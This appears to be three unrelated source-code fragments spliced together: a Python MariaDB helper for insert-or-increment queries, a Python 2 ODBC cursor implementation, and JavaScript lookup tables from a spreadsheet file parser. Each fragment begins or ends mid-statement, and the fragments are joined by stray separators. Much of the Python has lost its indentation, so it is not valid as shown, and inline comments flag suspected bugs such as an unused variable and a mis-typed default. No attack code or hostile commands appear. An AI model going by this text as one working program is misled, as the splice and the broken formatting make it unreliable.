                    values = ( index_value, ) + tuple(fields.values())
                    cursor.execute(cmd, values)
                    # In theory python MariaDB does autocommit, but I
                    # guess not?
                    connection.commit()
                    break	# success, get out of the retry loop
                except mariadb.ProgrammingError as e:
                    # if the database doesn't exist, the error will read
                    #
                    ## mariadb.ProgrammingError: Table 'DBNAME.TABLENAME table' doesn't exist
                    #
                    # if there is a better way, I am all ears
                    if not str(e).endswith(f"Table '{self.database}.{_table_name}' doesn't exist"):
                        raise
                    # ops, the table does not exist, create it with
                    # these fields; guess the types from the field
                    # values and retry; but we want to have FIRST the
                    # index column -- we rely on python3 keeping
                    # insertion order for dictionaries
                    f = { index_column: index_value }
                    f.update(fields)
                    try:
                        self._table_create(cursor, _table_name,
                                           defaults = True,
                                           index_column = index_column,
                                           **f)
                        connection.commit()
                    except mariadb.OperationalError as e:
                        if str(e).endswith(f"Table '{_table_name}' already exists"):
                            # someone did it already, retry
                            continue
                        raise
                    continue	# now try to insert/update again
                except mariadb.OperationalError as e:
                    # If any column does not exist, we'll get
                    #
                    ## mariadb.OperationalError: Unknown column ...blablah
                    #
                    # if there is a better way, I am all ears
                    if not str(e).startswith("Unknown column"):
                        raise
                    self._table_columns_update(cursor, _table_name, **fields)
                    # NOTE(review): `f` is rebuilt here but never used; the
                    # retry re-runs the insert with the original `fields`.
                    f = { index_column: index_value }
                    f.update(fields)
                    continue
def table_row_inc(self, table_name, index_column, index_value,
prefix_bare = "", **fields):
# Increment by one the listed fileds in the row matching
# index_value
#
# If the row does not exist, add it with the given fields set
# to one.
_table_name = self._table_name_prepare(table_name, prefix_bare)
connection = self._connection_get()
with connection.cursor() as cursor:
while True:
# Now try to inser the row; if we get errors because
# the table or columns still do not exist, fix'em and
# try again
try:
f = list(fields.keys())
f.remove(index_column) # no need to increase this field
# increase by one values of the specified columns in the row
# whose primary key (index_column) has the given index_value
#
## insert into TABLENAME (INDEX_COLUMN, FIELD1, FIELD2...)
## values (INDEX_VALUE, 1, 1, ...)
## on duplicate key update
## FIELD1 = value(FIELD1) + 1,
## FIELD2 = value(FIELD2) + 1,
## ...;
#
# note we use %s placeholders for the values, to let the
# python itnerface type them properly and pass execute() a
# tuple with the values
cmd = \
f"insert into `{_table_name}` (`{index_column}`, " \
+ ", ".join(f"`{column}`" for column in f) \
+ " ) values ( ?" + ", 1" * len(f) \
+ " ) on duplicate key update " \
+ ", ".join(
f"`{column}` = `{column}` + 1"
for column in f
) + ";"
cursor.execute(cmd, (index_value, ))
# In theory python MariaDB does autocommit, but I
# guess not?
connection.commit()
break # success, get out of the retry loop
except mariadb.ProgrammingError as e:
# if the database doesn't exist, the error will read
#
## mariadb.ProgrammingError: Table 'DBNAME.TABLENAME table' doesn't exist
#
# if there is a better way, I am all ears
if not str(e).endswith(f"Table '{self.database}.{_table_name}' doesn't exist"):
raise
# ops, the | |
print 'conx.type_size_dic.has_key(SQL_TYPE_DATE)'
sql_type = SQL_TYPE_DATE
buf_size = self.connection.type_size_dic[SQL_TYPE_DATE][0]
ParameterBuffer = create_buffer(buf_size)
col_size = self.connection.type_size_dic[SQL_TYPE_DATE][1]
else:
# SQL Sever <2008 doesn't have a DATE type.
sql_type = SQL_TYPE_TIMESTAMP
buf_size = 10
ParameterBuffer = create_buffer(buf_size)
elif issubclass(param_types[col_num], datetime.time):
sql_c_type = SQL_C_CHAR
if self.connection.type_size_dic.has_key(SQL_TYPE_TIME):
sql_type = SQL_TYPE_TIME
buf_size = self.connection.type_size_dic[SQL_TYPE_TIME][0]
ParameterBuffer = create_buffer(buf_size)
col_size = self.connection.type_size_dic[SQL_TYPE_TIME][1]
elif self.connection.type_size_dic.has_key(SQL_SS_TIME2):
# TIME type added in SQL Server 2008
sql_type = SQL_SS_TIME2
buf_size = self.connection.type_size_dic[SQL_SS_TIME2][0]
ParameterBuffer = create_buffer(buf_size)
col_size = self.connection.type_size_dic[SQL_SS_TIME2][1]
else:
# SQL Sever <2008 doesn't have a TIME type.
sql_type = SQL_TYPE_TIMESTAMP
buf_size = self.connection.type_size_dic[SQL_TYPE_TIMESTAMP][0]
ParameterBuffer = create_buffer(buf_size)
col_size = 3
elif issubclass(param_types[col_num], unicode):
sql_c_type = SQL_C_WCHAR
sql_type = SQL_WVARCHAR
buf_size = 255
ParameterBuffer = create_buffer_u(buf_size)
elif issubclass(param_types[col_num], str):
sql_c_type = SQL_C_CHAR
sql_type = SQL_VARCHAR
buf_size = 255
ParameterBuffer = create_buffer(buf_size)
elif issubclass(param_types[col_num], (bytearray, buffer)):
sql_c_type = SQL_C_BINARY
sql_type = SQL_LONGVARBINARY
buf_size = len(self._inputsizers)>col_num and self._inputsizers[col_num] or 20500
ParameterBuffer = create_buffer(buf_size)
else:
sql_c_type = SQL_C_CHAR
sql_type = SQL_LONGVARCHAR
buf_size = len(self._inputsizers)>col_num and self._inputsizers[col_num] or 20500
ParameterBuffer = create_buffer(buf_size)
temp_holder.append((sql_c_type, sql_type, buf_size, col_size, ParameterBuffer))
for col_num, (sql_c_type, sql_type, buf_size, col_size, ParameterBuffer) in enumerate(temp_holder):
BufferLen = ctypes.c_ssize_t(buf_size)
LenOrIndBuf = ctypes.c_ssize_t()
InputOutputType = SQL_PARAM_INPUT
if len(pram_io_list) > col_num:
InputOutputType = pram_io_list[col_num]
ret = SQLBindParameter(self._stmt_h, col_num + 1, InputOutputType, sql_c_type, sql_type, buf_size,\
col_size, ADDR(ParameterBuffer), BufferLen,ADDR(LenOrIndBuf))
if ret != SQL_SUCCESS:
validate(ret, SQL_HANDLE_STMT, self._stmt_h)
# Append the value buffer and the lenth buffer to the array
ParamBufferList.append((ParameterBuffer,LenOrIndBuf,sql_type))
self._last_param_types = param_types
self._ParamBufferList = ParamBufferList
    def _CreateColBuf(self):
        # Pre-allocate one fetch buffer per result-set column, sized from the
        # column's SQL data type and any user-supplied output-size overrides
        # (self._outputsize).  Fills self._ColBufferList with
        # [name, C type, used-length cell, buffer, size, converter] entries.
        NOC = self._NumOfCols()
        self._ColBufferList = []
        # Row type is (re)built lazily on the first fetch -- see _GetData.
        self._row_type = None
        for col_num in range(NOC):
            col_name = self.description[col_num][0]
            col_sql_data_type = self._ColTypeCodeList[col_num]
            # set default size base on the column's sql data type
            total_buf_len = SQL_data_type_dict[col_sql_data_type][4]
            # over-write if there's preset size value for "large columns"
            if total_buf_len >= 20500:
                total_buf_len = self._outputsize.get(None,total_buf_len)
            # over-write if there's preset size value for the "col_num" column
            total_buf_len = self._outputsize.get(col_num, total_buf_len)
            alloc_buffer = SQL_data_type_dict[col_sql_data_type][3](total_buf_len)
            used_buf_len = ctypes.c_ssize_t()
            target_type = SQL_data_type_dict[col_sql_data_type][2]
            force_unicode = self.connection.unicode_results
            if force_unicode and col_sql_data_type in (SQL_CHAR,SQL_VARCHAR,SQL_LONGVARCHAR):
                # Caller asked for unicode results: fetch narrow char columns
                # as wide chars instead.
                target_type = SQL_C_WCHAR
                alloc_buffer = create_buffer_u(total_buf_len)
            buf_cvt_func = self.connection.output_converter[self._ColTypeCodeList[col_num]]
            self._ColBufferList.append([col_name, target_type, used_buf_len, alloc_buffer, total_buf_len, buf_cvt_func])
    def _GetData(self):
        '''Fetch the current row: read each bound column via SQLGetData,
        reassembling chunked (long) values, convert, and return a row object.'''
        # Lazily create the row type on first fetch.
        if self._row_type is None:
            self._row_type = self.row_type_callable(self)
        value_list = []
        col_num = 0
        for col_name, target_type, used_buf_len, alloc_buffer, total_buf_len, buf_cvt_func in self._ColBufferList:
            blocks = []
            # SQLGetData may deliver a large value in several chunks:
            # SQL_SUCCESS_WITH_INFO means "more to come", SQL_SUCCESS is the
            # final (or only) chunk, SQL_NO_DATA ends the loop.
            while True:
                ret = ODBC_API.SQLGetData(self._stmt_h, col_num + 1, target_type, ADDR(alloc_buffer), total_buf_len,\
                    ADDR(used_buf_len))
                validate(ret, SQL_HANDLE_STMT, self._stmt_h)
                if ret == SQL_SUCCESS:
                    if used_buf_len.value == SQL_NULL_DATA:
                        blocks.append(None)
                    else:
                        if target_type == SQL_C_BINARY:
                            blocks.append(alloc_buffer.raw[:used_buf_len.value])
                        elif target_type == SQL_C_WCHAR:
                            blocks.append(from_buffer_u(alloc_buffer))
                        else:
                            blocks.append(alloc_buffer.value)
                    break
                if ret == SQL_SUCCESS_WITH_INFO:
                    # Partial chunk: take the whole buffer and keep reading.
                    if target_type == SQL_C_BINARY:
                        blocks.append(alloc_buffer.raw)
                    else:
                        blocks.append(alloc_buffer.value)
                if ret == SQL_NO_DATA:
                    break
            if len(blocks) == 1:
                raw_value = blocks[0]
            else:
                # NOTE(review): joining with '' assumes all chunks are str;
                # a chunked SQL_C_BINARY column would need ''.join on bytes --
                # confirm against the driver's chunking behavior.
                raw_value = ''.join(blocks)
            if raw_value == None:
                value_list.append(None)
            else:
                value_list.append(buf_cvt_func(raw_value))
            col_num += 1
        return self._row_type(value_list)
    def _UpdateDesc(self):
        "Get the information of (name, type_code, display_size, internal_size, col_precision, scale, null_ok)"
        Cname = create_buffer(1024)
        Cname_ptr = ctypes.c_short()
        Ctype_code = ctypes.c_short()
        Csize = ctypes.c_size_t()
        Cdisp_size = ctypes.c_ssize_t(0)
        CDecimalDigits = ctypes.c_short()
        Cnull_ok = ctypes.c_short()
        ColDescr = []
        self._ColTypeCodeList = []
        NOC = self._NumOfCols()
        for col in range(1, NOC+1):
            # Display size first (SQLColAttribute), then the full column
            # description (SQLDescribeCol).
            ret = ODBC_API.SQLColAttribute(self._stmt_h, col, SQL_DESC_DISPLAY_SIZE, ADDR(create_buffer(10)),
                10, ADDR(ctypes.c_short()),ADDR(Cdisp_size))
            validate(ret, SQL_HANDLE_STMT, self._stmt_h)
            ret = ODBC_API.SQLDescribeCol(self._stmt_h, col, Cname, len(Cname), ADDR(Cname_ptr),\
                ADDR(Ctype_code),ADDR(Csize),ADDR(CDecimalDigits), ADDR(Cnull_ok))
            validate(ret, SQL_HANDLE_STMT, self._stmt_h)
            col_name = Cname.value
            if lowercase:
                col_name = str.lower(col_name)
            #(name, type_code, display_size,
            # internal_size, col_precision, scale, null_ok)
            # NOTE(review): the dict .get fallback `(Ctype_code.value)` is not
            # a tuple, so an unknown type code would raise on the `[0]` index
            # -- confirm whether unknown codes can occur here.
            ColDescr.append((col_name, SQL_data_type_dict.get(Ctype_code.value,(Ctype_code.value))[0],Cdisp_size.value,\
                Csize.value, Csize.value,CDecimalDigits.value,Cnull_ok.value == 1 and True or False))
            self._ColTypeCodeList.append(Ctype_code.value)
        if len(ColDescr) > 0:
            self.description = ColDescr
        else:
            self.description = None
        # Re-bind fetch buffers for the new result-set shape.
        self._CreateColBuf()
def _NumOfRows(self):
"""Get the number of rows"""
NOR = ctypes.c_ssize_t()
ret = ODBC_API.SQLRowCount(self._stmt_h, ADDR(NOR))
validate(ret, SQL_HANDLE_STMT, self._stmt_h)
self.rowcount = NOR.value
return self.rowcount
def _NumOfCols(self):
"""Get the number of cols"""
NOC = ctypes.c_short()
ret = ODBC_API.SQLNumResultCols(self._stmt_h, ADDR(NOC))
validate(ret, SQL_HANDLE_STMT, self._stmt_h)
return NOC.value
def fetchall(self):
rows = []
while True:
row = self.fetchone()
if row == None:
break
rows.append(row)
return rows
def fetchmany(self, num = None):
if num == None:
num = self.arraysize
rows, row_num = [], 0
while row_num < num:
row = self.fetchone()
if row == None:
break
rows.append(row)
row_num += 1
return rows
def fetchone(self):
ret = SQLFetch(self._stmt_h)
if ret == SQL_SUCCESS:
return self._GetData()
else:
if ret == SQL_NO_DATA_FOUND:
return None
else:
validate(ret, SQL_HANDLE_STMT, self._stmt_h)
def next(self):
row = self.fetchone()
if row == None:
raise(StopIteration)
return row
    def __iter__(self):
        # The cursor iterates over its own result rows.
        return self
def skip(self, count = 0):
for i in xrange(count):
ret = ODBC_API.SQLFetchScroll(self._stmt_h, SQL_FETCH_NEXT, 0)
if ret != SQL_SUCCESS:
validate(ret, SQL_HANDLE_STMT, self._stmt_h)
return None
def nextset(self):
ret = ODBC_API.SQLMoreResults(self._stmt_h)
if ret not in (SQL_SUCCESS, SQL_NO_DATA):
validate(ret, SQL_HANDLE_STMT, self._stmt_h)
if ret == SQL_NO_DATA:
self._free_results('FREE_STATEMENT')
return False
else:
self._NumOfRows()
self._UpdateDesc()
#self._BindCols()
return True
def _free_results(self, free_statement):
if not self.connection.connected:
raise ProgrammingError('HY000','Attempt to use a closed connection.')
self.description = None
if free_statement == 'FREE_STATEMENT':
ret = ODBC_API.SQLFreeStmt(self._stmt_h, SQL_CLOSE)
validate(ret, SQL_HANDLE_STMT, self._stmt_h)
else:
ret = ODBC_API.SQLFreeStmt(self._stmt_h, SQL_UNBIND)
validate(ret, SQL_HANDLE_STMT, self._stmt_h)
ret = ODBC_API.SQLFreeStmt(self._stmt_h, SQL_RESET_PARAMS)
validate(ret, SQL_HANDLE_STMT, self._stmt_h)
self.rowcount = -1
def getTypeInfo(self, sqlType = None):
if sqlType == None:
type = SQL_ALL_TYPES
else:
type = sqlType
ret = ODBC_API.SQLGetTypeInfo(self._stmt_h, type)
if ret in (SQL_SUCCESS, SQL_SUCCESS_WITH_INFO):
self._NumOfRows()
self._UpdateDesc()
#self._BindCols()
return self.fetchone()
def tables(self, table=None, catalog=None, schema=None, tableType=None):
"""Return a list with all tables"""
l_catalog = l_schema = l_table = l_tableType = 0
if catalog != None:
l_catalog = len(catalog)
catalog = ctypes.c_char_p(catalog)
if schema != None:
l_schema = len(schema)
schema = ctypes.c_char_p(schema)
if table != None:
l_table = len(table)
table = ctypes.c_char_p(table)
if tableType != None:
l_tableType = len(tableType)
tableType = ctypes.c_char_p(tableType)
self._free_results('FREE_STATEMENT')
self.statement = None
ret = ODBC_API.SQLTables(self._stmt_h,
catalog, l_catalog,
schema, l_schema,
table, l_table,
tableType, l_tableType)
validate(ret, SQL_HANDLE_STMT, self._stmt_h)
self._NumOfRows()
self._UpdateDesc()
#self._BindCols()
return (self)
def columns(self, table=None, catalog=None, schema=None, column=None):
"""Return a list with all columns"""
l_catalog = l_schema = l_table = l_column = 0
if catalog != None:
l_catalog = len(catalog)
catalog = ctypes.c_char_p(catalog)
if schema != None:
l_schema = len(schema)
schema = ctypes.c_char_p(schema)
if table != None:
l_table = len(table)
table = ctypes.c_char_p(table)
if column != None:
l_column = len(column)
column = ctypes.c_char_p(column)
self._free_results('FREE_STATEMENT')
self.statement = None
ret = ODBC_API.SQLColumns(self._stmt_h,
catalog, l_catalog,
schema, l_schema,
table, l_table,
column, l_column)
validate(ret, SQL_HANDLE_STMT, self._stmt_h)
self._NumOfRows()
self._UpdateDesc()
#self._BindCols()
return (self)
def primaryKeys(self, table=None, catalog=None, schema=None):
l_catalog = l_schema = l_table = 0
if catalog != None:
l_catalog = len(catalog)
catalog = ctypes.c_char_p(catalog)
if schema != None:
l_schema = len(schema)
schema = ctypes.c_char_p(schema)
if table != None:
l_table = len(table)
table = ctypes.c_char_p(table)
self._free_results('FREE_STATEMENT')
self.statement = None
ret = ODBC_API.SQLPrimaryKeys(self._stmt_h,
catalog, l_catalog,
schema, l_schema,
table, l_table)
validate(ret, SQL_HANDLE_STMT, self._stmt_h)
self._NumOfRows()
self._UpdateDesc()
#self._BindCols()
return (self)
def foreignKeys(self, table=None, catalog=None, schema=None, foreignTable=None, foreignCatalog=None, foreignSchema=None):
l_catalog = l_schema = l_table = l_foreignTable = l_foreignCatalog = l_foreignSchema = 0
if catalog != None:
l_catalog = len(catalog)
catalog = ctypes.c_char_p(catalog)
if schema != None:
l_schema = len(schema)
schema = ctypes.c_char_p(schema)
if table != None:
l_table = len(table)
table = ctypes.c_char_p(table)
if foreignTable != None:
l_foreignTable = len(foreignTable)
foreignTable = ctypes.c_char_p(foreignTable)
if foreignCatalog != None:
l_foreignCatalog = len(foreignCatalog)
foreignCatalog = ctypes.c_char_p(foreignCatalog)
if foreignSchema != None:
l_foreignSchema = len(foreignSchema)
foreignSchema = ctypes.c_char_p(foreignSchema)
self._free_results('FREE_STATEMENT')
self.statement = None
ret = ODBC_API.SQLForeignKeys(self._stmt_h,
catalog, l_catalog,
schema, l_schema,
table, l_table,
foreignCatalog, l_foreignCatalog,
foreignSchema, l_foreignSchema,
foreignTable, l_foreignTable)
validate(ret, SQL_HANDLE_STMT, self._stmt_h)
self._NumOfRows()
self._UpdateDesc()
#self._BindCols()
return (self)
def procedurecolumns(self, procedure=None, catalog=None, schema=None, column=None):
l_catalog = l_schema = l_procedure = l_column = 0
if catalog != None:
l_catalog = len(catalog)
catalog = ctypes.c_char_p(catalog)
if schema != None:
l_schema = len(schema)
schema = ctypes.c_char_p(schema)
if procedure != None:
l_procedure = len(procedure)
procedure = ctypes.c_char_p(procedure)
if column != None:
l_column = len(column)
column = ctypes.c_char_p(column)
self._free_results('FREE_STATEMENT')
self.statement = None
ret = ODBC_API.SQLProcedureColumns(self._stmt_h,
catalog, l_catalog,
schema, l_schema,
procedure, l_procedure,
column, l_column)
validate(ret, SQL_HANDLE_STMT, self._stmt_h)
self._NumOfRows()
self._UpdateDesc()
return (self)
def procedures(self, procedure=None, catalog=None, schema=None):
l_catalog = l_schema = l_procedure = 0
if catalog != None:
l_catalog = len(catalog)
catalog = ctypes.c_char_p(catalog)
if schema != None:
l_schema = len(schema)
schema = ctypes.c_char_p(schema)
if procedure != None:
l_procedure = len(procedure)
procedure | |
*/
0x0089: 2, /* FWRITELN */
0x008A: 2, /* FWRITE */
0x008C: 1, /* DATEVALUE */
0x008D: 1, /* TIMEVALUE */
0x008E: 3, /* SLN */
0x008F: 4, /* SYD */
0x00A2: 1, /* CLEAN */
0x00A3: 1, /* MDETERM */
0x00A4: 1, /* MINVERSE */
0x00A5: 2, /* MMULT */
0x00AC: 1, /* WHILE */
0x00AF: 2, /* INITIATE */
0x00B0: 2, /* REQUEST */
0x00B1: 3, /* POKE */
0x00B2: 2, /* EXECUTE */
0x00B3: 1, /* TERMINATE */
0x00B8: 1, /* FACT */
0x00BD: 3, /* DPRODUCT */
0x00BE: 1, /* ISNONTEXT */
0x00C3: 3, /* DSTDEVP */
0x00C4: 3, /* DVARP */
0x00C6: 1, /* ISLOGICAL */
0x00C7: 3, /* DCOUNTA */
0x00C9: 1, /* UNREGISTER */
0x00CF: 4, /* REPLACEB */
0x00D2: 3, /* MIDB */
0x00D3: 1, /* LENB */
0x00D4: 2, /* ROUNDUP */
0x00D5: 2, /* ROUNDDOWN */
0x00D6: 1, /* ASC */
0x00D7: 1, /* DBCS */
0x00E5: 1, /* SINH */
0x00E6: 1, /* COSH */
0x00E7: 1, /* TANH */
0x00E8: 1, /* ASINH */
0x00E9: 1, /* ACOSH */
0x00EA: 1, /* ATANH */
0x00EB: 3, /* DGET */
0x00F4: 1, /* INFO */
0x00FC: 2, /* FREQUENCY */
0x0101: 1, /* EVALUATE */
0x0105: 1, /* ERROR.TYPE */
0x010F: 1, /* GAMMALN */
0x0111: 4, /* BINOMDIST */
0x0112: 2, /* CHIDIST */
0x0113: 2, /* CHIINV */
0x0114: 2, /* COMBIN */
0x0115: 3, /* CONFIDENCE */
0x0116: 3, /* CRITBINOM */
0x0117: 1, /* EVEN */
0x0118: 3, /* EXPONDIST */
0x0119: 3, /* FDIST */
0x011A: 3, /* FINV */
0x011B: 1, /* FISHER */
0x011C: 1, /* FISHERINV */
0x011D: 2, /* FLOOR */
0x011E: 4, /* GAMMADIST */
0x011F: 3, /* GAMMAINV */
0x0120: 2, /* CEILING */
0x0121: 4, /* HYPGEOMDIST */
0x0122: 3, /* LOGNORMDIST */
0x0123: 3, /* LOGINV */
0x0124: 3, /* NEGBINOMDIST */
0x0125: 4, /* NORMDIST */
0x0126: 1, /* NORMSDIST */
0x0127: 3, /* NORMINV */
0x0128: 1, /* NORMSINV */
0x0129: 3, /* STANDARDIZE */
0x012A: 1, /* ODD */
0x012B: 2, /* PERMUT */
0x012C: 3, /* POISSON */
0x012D: 3, /* TDIST */
0x012E: 4, /* WEIBULL */
0x012F: 2, /* SUMXMY2 */
0x0130: 2, /* SUMX2MY2 */
0x0131: 2, /* SUMX2PY2 */
0x0132: 2, /* CHITEST */
0x0133: 2, /* CORREL */
0x0134: 2, /* COVAR */
0x0135: 3, /* FORECAST */
0x0136: 2, /* FTEST */
0x0137: 2, /* INTERCEPT */
0x0138: 2, /* PEARSON */
0x0139: 2, /* RSQ */
0x013A: 2, /* STEYX */
0x013B: 2, /* SLOPE */
0x013C: 4, /* TTEST */
0x0145: 2, /* LARGE */
0x0146: 2, /* SMALL */
0x0147: 2, /* QUARTILE */
0x0148: 2, /* PERCENTILE */
0x014B: 2, /* TRIMMEAN */
0x014C: 2, /* TINV */
0x0151: 2, /* POWER */
0x0156: 1, /* RADIANS */
0x0157: 1, /* DEGREES */
0x015A: 2, /* COUNTIF */
0x015B: 1, /* COUNTBLANK */
0x015E: 4, /* ISPMT */
0x015F: 3, /* DATEDIF */
0x0160: 1, /* DATESTRING */
0x0161: 2, /* NUMBERSTRING */
0x0168: 1, /* PHONETIC */
0x0170: 1, /* BAHTTEXT */
0x0171: 1, /* THAIDAYOFWEEK */
0x0172: 1, /* THAIDIGIT */
0x0173: 1, /* THAIMONTHOFYEAR */
0x0174: 1, /* THAINUMSOUND */
0x0175: 1, /* THAINUMSTRING */
0x0176: 1, /* THAISTRINGLENGTH */
0x0177: 1, /* ISTHAIDIGIT */
0x0178: 1, /* ROUNDBAHTDOWN */
0x0179: 1, /* ROUNDBAHTUP */
0x017A: 1, /* THAIYEAR */
0xFFFF: 0
};
/* [MS-XLSX] 2.2.3 Functions */
var XLSXFutureFunctions = {
/* storage name as written inside formulae ("_xlfn." prefix) -> the
   user-visible function name Excel displays */
"_xlfn.ACOT": "ACOT",
"_xlfn.ACOTH": "ACOTH",
"_xlfn.AGGREGATE": "AGGREGATE",
"_xlfn.ARABIC": "ARABIC",
"_xlfn.AVERAGEIF": "AVERAGEIF",
"_xlfn.AVERAGEIFS": "AVERAGEIFS",
"_xlfn.BASE": "BASE",
"_xlfn.BETA.DIST": "BETA.DIST",
"_xlfn.BETA.INV": "BETA.INV",
"_xlfn.BINOM.DIST": "BINOM.DIST",
"_xlfn.BINOM.DIST.RANGE": "BINOM.DIST.RANGE",
"_xlfn.BINOM.INV": "BINOM.INV",
"_xlfn.BITAND": "BITAND",
"_xlfn.BITLSHIFT": "BITLSHIFT",
"_xlfn.BITOR": "BITOR",
"_xlfn.BITRSHIFT": "BITRSHIFT",
"_xlfn.BITXOR": "BITXOR",
"_xlfn.CEILING.MATH": "CEILING.MATH",
"_xlfn.CEILING.PRECISE": "CEILING.PRECISE",
"_xlfn.CHISQ.DIST": "CHISQ.DIST",
"_xlfn.CHISQ.DIST.RT": "CHISQ.DIST.RT",
"_xlfn.CHISQ.INV": "CHISQ.INV",
"_xlfn.CHISQ.INV.RT": "CHISQ.INV.RT",
"_xlfn.CHISQ.TEST": "CHISQ.TEST",
"_xlfn.COMBINA": "COMBINA",
"_xlfn.CONFIDENCE.NORM": "CONFIDENCE.NORM",
"_xlfn.CONFIDENCE.T": "CONFIDENCE.T",
"_xlfn.COT": "COT",
"_xlfn.COTH": "COTH",
"_xlfn.COUNTIFS": "COUNTIFS",
"_xlfn.COVARIANCE.P": "COVARIANCE.P",
"_xlfn.COVARIANCE.S": "COVARIANCE.S",
"_xlfn.CSC": "CSC",
"_xlfn.CSCH": "CSCH",
"_xlfn.DAYS": "DAYS",
"_xlfn.DECIMAL": "DECIMAL",
"_xlfn.ECMA.CEILING": "ECMA.CEILING",
"_xlfn.ERF.PRECISE": "ERF.PRECISE",
"_xlfn.ERFC.PRECISE": "ERFC.PRECISE",
"_xlfn.EXPON.DIST": "EXPON.DIST",
"_xlfn.F.DIST": "F.DIST",
"_xlfn.F.DIST.RT": "F.DIST.RT",
"_xlfn.F.INV": "F.INV",
"_xlfn.F.INV.RT": "F.INV.RT",
"_xlfn.F.TEST": "F.TEST",
"_xlfn.FILTERXML": "FILTERXML",
"_xlfn.FLOOR.MATH": "FLOOR.MATH",
"_xlfn.FLOOR.PRECISE": "FLOOR.PRECISE",
"_xlfn.FORMULATEXT": "FORMULATEXT",
"_xlfn.GAMMA": "GAMMA",
"_xlfn.GAMMA.DIST": "GAMMA.DIST",
"_xlfn.GAMMA.INV": "GAMMA.INV",
"_xlfn.GAMMALN.PRECISE": "GAMMALN.PRECISE",
"_xlfn.GAUSS": "GAUSS",
"_xlfn.HYPGEOM.DIST": "HYPGEOM.DIST",
"_xlfn.IFNA": "IFNA",
"_xlfn.IFERROR": "IFERROR",
"_xlfn.IMCOSH": "IMCOSH",
"_xlfn.IMCOT": "IMCOT",
"_xlfn.IMCSC": "IMCSC",
"_xlfn.IMCSCH": "IMCSCH",
"_xlfn.IMSEC": "IMSEC",
"_xlfn.IMSECH": "IMSECH",
"_xlfn.IMSINH": "IMSINH",
"_xlfn.IMTAN": "IMTAN",
"_xlfn.ISFORMULA": "ISFORMULA",
"_xlfn.ISO.CEILING": "ISO.CEILING",
"_xlfn.ISOWEEKNUM": "ISOWEEKNUM",
"_xlfn.LOGNORM.DIST": "LOGNORM.DIST",
"_xlfn.LOGNORM.INV": "LOGNORM.INV",
"_xlfn.MODE.MULT": "MODE.MULT",
"_xlfn.MODE.SNGL": "MODE.SNGL",
"_xlfn.MUNIT": "MUNIT",
"_xlfn.NEGBINOM.DIST": "NEGBINOM.DIST",
"_xlfn.NETWORKDAYS.INTL": "NETWORKDAYS.INTL",
/* NOTE(review): "NIGBINOM" looks like a typo for NEGBINOM but may be
   deliberate (matching the spec text) -- confirm against [MS-XLSX] before
   changing. */
"_xlfn.NIGBINOM": "NIGBINOM",
"_xlfn.NORM.DIST": "NORM.DIST",
"_xlfn.NORM.INV": "NORM.INV",
"_xlfn.NORM.S.DIST": "NORM.S.DIST",
"_xlfn.NORM.S.INV": "NORM.S.INV",
"_xlfn.NUMBERVALUE": "NUMBERVALUE",
"_xlfn.PDURATION": "PDURATION",
"_xlfn.PERCENTILE.EXC": "PERCENTILE.EXC",
"_xlfn.PERCENTILE.INC": "PERCENTILE.INC",
"_xlfn.PERCENTRANK.EXC": "PERCENTRANK.EXC",
"_xlfn.PERCENTRANK.INC": "PERCENTRANK.INC",
"_xlfn.PERMUTATIONA": "PERMUTATIONA",
"_xlfn.PHI": "PHI",
"_xlfn.POISSON.DIST": "POISSON.DIST",
"_xlfn.QUARTILE.EXC": "QUARTILE.EXC",
"_xlfn.QUARTILE.INC": "QUARTILE.INC",
"_xlfn.QUERYSTRING": "QUERYSTRING",
"_xlfn.RANK.AVG": "RANK.AVG",
"_xlfn.RANK.EQ": "RANK.EQ",
"_xlfn.RRI": "RRI",
"_xlfn.SEC": "SEC",
"_xlfn.SECH": "SECH",
"_xlfn.SHEET": "SHEET",
"_xlfn.SHEETS": "SHEETS",
"_xlfn.SKEW.P": "SKEW.P",
"_xlfn.STDEV.P": "STDEV.P",
"_xlfn.STDEV.S": "STDEV.S",
"_xlfn.SUMIFS": "SUMIFS",
"_xlfn.T.DIST": "T.DIST",
"_xlfn.T.DIST.2T": "T.DIST.2T",
"_xlfn.T.DIST.RT": "T.DIST.RT",
"_xlfn.T.INV": "T.INV",
"_xlfn.T.INV.2T": "T.INV.2T",
"_xlfn.T.TEST": "T.TEST",
"_xlfn.UNICHAR": "UNICHAR",
"_xlfn.UNICODE": "UNICODE",
"_xlfn.VAR.P": "VAR.P",
"_xlfn.VAR.S": "VAR.S",
"_xlfn.WEBSERVICE": "WEBSERVICE",
"_xlfn.WEIBULL.DIST": "WEIBULL.DIST",
"_xlfn.WORKDAY.INTL": "WORKDAY.INTL",
"_xlfn.XOR": "XOR",
"_xlfn.Z.TEST": "Z.TEST"
};
var RecordEnum = {
0x0006: { n:"Formula", f:parse_Formula },
0x000a: { n:'EOF', f:parse_EOF },
0x000c: { n:"CalcCount", f:parse_CalcCount },
0x000d: { n:"CalcMode", f:parse_CalcMode },
0x000e: { n:"CalcPrecision", f:parse_CalcPrecision },
0x000f: { n:"CalcRefMode", f:parse_CalcRefMode },
0x0010: { n:"CalcDelta", f:parse_CalcDelta },
0x0011: { n:"CalcIter", f:parse_CalcIter },
0x0012: { n:"Protect", f:parse_Protect },
0x0013: { n:"Password", f:parse_Password },
0x0014: { n:"Header", f:parse_Header },
0x0015: { n:"Footer", f:parse_Footer },
0x0017: { n:"ExternSheet", f:parse_ExternSheet },
0x0018: { n:"Lbl", f:parse_Lbl },
0x0019: { n:"WinProtect", f:parse_WinProtect },
0x001a: { n:"VerticalPageBreaks", f:parse_VerticalPageBreaks },
0x001b: { n:"HorizontalPageBreaks", f:parse_HorizontalPageBreaks },
0x001c: { n:"Note", f:parse_Note },
0x001d: { n:"Selection", f:parse_Selection },
0x0022: { n:"Date1904", f:parse_Date1904 },
0x0023: { n:"ExternName", f:parse_ExternName },
0x0026: { n:"LeftMargin", f:parse_LeftMargin },
0x0027: { n:"RightMargin", f:parse_RightMargin },
0x0028: { n:"TopMargin", f:parse_TopMargin },
0x0029: { n:"BottomMargin", f:parse_BottomMargin },
0x002a: { n:"PrintRowCol", f:parse_PrintRowCol },
0x002b: { n:"PrintGrid", f:parse_PrintGrid },
0x002f: { n:"FilePass", f:parse_FilePass },
0x0031: { n:"Font", f:parse_Font },
0x0033: { n:"PrintSize", f:parse_PrintSize },
0x003c: { n:"Continue", f:parse_Continue },
0x003d: { n:"Window1", f:parse_Window1 },
0x0040: { n:"Backup", f:parse_Backup },
0x0041: { n:"Pane", f:parse_Pane },
0x0042: { n:'CodePage', f:parse_CodePage },
0x004d: { n:"Pls", f:parse_Pls },
0x0050: { n:"DCon", f:parse_DCon },
0x0051: { n:"DConRef", f:parse_DConRef },
0x0052: { n:"DConName", f:parse_DConName },
